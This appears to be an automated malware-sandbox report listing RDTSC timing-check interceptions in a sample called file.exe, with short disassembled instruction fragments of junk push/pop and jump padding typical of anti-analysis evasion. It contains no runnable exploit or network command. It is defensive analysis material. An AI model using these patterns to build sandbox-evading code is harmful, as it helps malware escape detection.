Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B36E4E second address: B36E58 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD184FDBE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B36E58 second address: B36E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B36E5E second address: B36E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD184FDBE7Eh 0x00000009 je 00007FD184FDBE76h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B3717C second address: B37182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B37182 second address: B3718E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B37DD6 second address: B37DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B40794 second address: B40798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B40798 second address: B4079C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B40A25 second address: B40A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B40A30 second address: B40A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD185A97D0Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B40A43 second address: B40A6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE85h 0x00000007 jno 00007FD184FDBE76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007FD184FDBE76h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40E8B second address: B40E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B40E8F second address: B40EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD184FDBE80h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B479E3 second address: B479EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B482E7 second address: B482EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B482EC second address: B482F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B486D8 second address: B486E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD184FDBE76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B486E2 second address: B48726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edx 0x00000008 jns 00007FD185A97D1Bh 0x0000000e pushad 0x0000000f jmp 00007FD185A97D18h 0x00000014 jnp 00007FD185A97D06h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48726 second address: B4872C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4F880 second address: B4F886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5564C second address: B55668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD184FDBE88h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55668 second address: B55672 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD185A97D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55672 second address: B55678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55678 second address: B55682 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD185A97D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55682 second address: B5569A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE7Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FD184FDBE7Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63F66 second address: B63F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B639F4 second address: B63A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FD184FDBE7Eh 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B63A0A second address: B63A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD185A97D06h 0x0000000a pop edi 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FD185A97D06h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B69C21 second address: B69C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6F570 second address: B6F58D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD185A97D17h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73592 second address: B73596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73596 second address: B735B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD185A97D10h 0x0000000b pop eax 0x0000000c jc 00007FD185A97D37h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B735B7 second address: B735BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B735BD second address: B735C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7538F second address: B75393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B75249 second address: B7524F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7524F second address: B75264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FD184FDBE80h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7C5EC second address: B7C624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D0Ah 0x00000009 pop edi 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD185A97D18h 0x00000012 jmp 00007FD185A97D0Eh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AE7E second address: B7AE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AE82 second address: B7AE8B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AE8B second address: B7AE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AE91 second address: B7AE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AE97 second address: B7AE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AE9F second address: B7AEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AEA5 second address: B7AEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD184FDBE7Ah 0x00000009 jc 00007FD184FDBE76h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7AEC0 second address: B7AEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B176 second address: B7B1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE87h 0x00000007 push edi 0x00000008 jnp 00007FD184FDBE76h 0x0000000e je 00007FD184FDBE76h 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007FD184FDBE82h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B1B7 second address: B7B1CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD185A97D0Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7C33B second address: B7C36B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE7Fh 0x00000007 jmp 00007FD184FDBE84h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7EBBF second address: B7EBC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7EBC6 second address: B7EBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD184FDBE76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B83ACA second address: B83AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D236 second address: B8D23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D23C second address: B8D241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D241 second address: B8D267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FD184FDBE80h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9057B second address: B905A9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FD185A97D12h 0x00000010 jmp 00007FD185A97D0Ch 0x00000015 jmp 00007FD185A97D12h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B905A9 second address: B905D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE87h 0x00000007 push eax 0x00000008 jmp 00007FD184FDBE82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95F47 second address: B95F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D0Ch 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA4648 second address: BA4652 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD184FDBE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA47AA second address: BA47B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA7904 second address: BA7908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB394 second address: BBB3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD185A97D0Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB3A7 second address: BBB3AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB57C second address: BBB580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB580 second address: BBB586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB586 second address: BBB5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FD185A97D06h 0x0000000e jmp 00007FD185A97D0Dh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB6D4 second address: BBB6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FD184FDBE7Fh 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB6EE second address: BBB6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB6F7 second address: BBB726 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD184FDBE87h 0x00000008 jmp 00007FD184FDBE83h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB726 second address: BBB72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB9BD second address: BBB9D8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD184FDBE7Eh 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jc 00007FD184FDBE76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBB9D8 second address: BBB9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FD185A97D08h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBB54 second address: BBBBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FD184FDBE87h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f jns 00007FD184FDBE76h 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push edi 0x00000019 jmp 00007FD184FDBE7Ch 0x0000001e pop edi 0x0000001f jc 00007FD184FDBE90h 0x00000025 jmp 00007FD184FDBE84h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBE31 second address: BBBE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBE37 second address: BBBE3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBBE3B second address: BBBE51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBEFFE second address: BBF004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF004 second address: BBF057 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD185A97D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f jmp 00007FD185A97D19h 0x00000014 push 00000004h 0x00000016 mov dx, si 0x00000019 call 00007FD185A97D09h 0x0000001e pushad 0x0000001f jnp 00007FD185A97D0Ch 0x00000025 jne 00007FD185A97D08h 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF057 second address: BBF05D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF05D second address: BBF078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD185A97D16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF078 second address: BBF08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e js 00007FD184FDBE76h 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF08D second address: BBF092 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF092 second address: BBF0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnl 00007FD184FDBE91h 0x0000000f push edx 0x00000010 jmp 00007FD184FDBE89h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007FD184FDBE76h 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF0CA second address: BBF0E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBF0E7 second address: BBF0EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC066E second address: BC0674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0674 second address: BC0678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0678 second address: BC0698 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD185A97D17h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0698 second address: BC06B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD184FDBE80h 0x0000000e jl 00007FD184FDBE76h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC06B7 second address: BC06BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC21EA second address: BC21F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1D8B second address: BC1D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1D91 second address: BC1DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD184FDBE88h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1DAD second address: BC1DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD185A97D0Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1DC3 second address: BC1DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10250 second address: 4E10256 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10256 second address: 4E1025C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1025C second address: 4E10260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10260 second address: 4E1027B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD184FDBE7Bh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1027B second address: 4E1027F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1027F second address: 4E10285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
